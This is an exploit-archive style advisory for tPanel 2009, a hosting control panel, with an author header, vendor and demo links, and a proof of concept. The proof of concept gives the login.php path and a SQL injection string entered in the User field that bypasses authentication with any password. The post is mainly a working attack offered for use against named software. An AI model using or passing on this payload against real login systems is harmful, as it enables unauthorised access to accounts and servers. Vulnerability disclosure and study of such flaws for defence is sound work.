tPanel 2009 SQL Injection

tPanel 2009 suffers from a remote SQL injection vulnerability that allows for authentication bypass.


MD5 | 6409dfe34735a4b6869205dd9988b7fd

# # # # # 
# Exploit Title: tPanel 2009 - Authentication Bypass
# Dork: N/A
# Date: 29.09.2017
# Vendor Homepage: http://www.datacomponents.net/
# Software Link: http://www.datacomponents.net/products/hosting/tpanel/
# Demo: http://demo.datacomponents.net/tpanel/
# Version: 2009
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
#
# http://localhost/[PATH]/login.php
#
# User: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #

Related Posts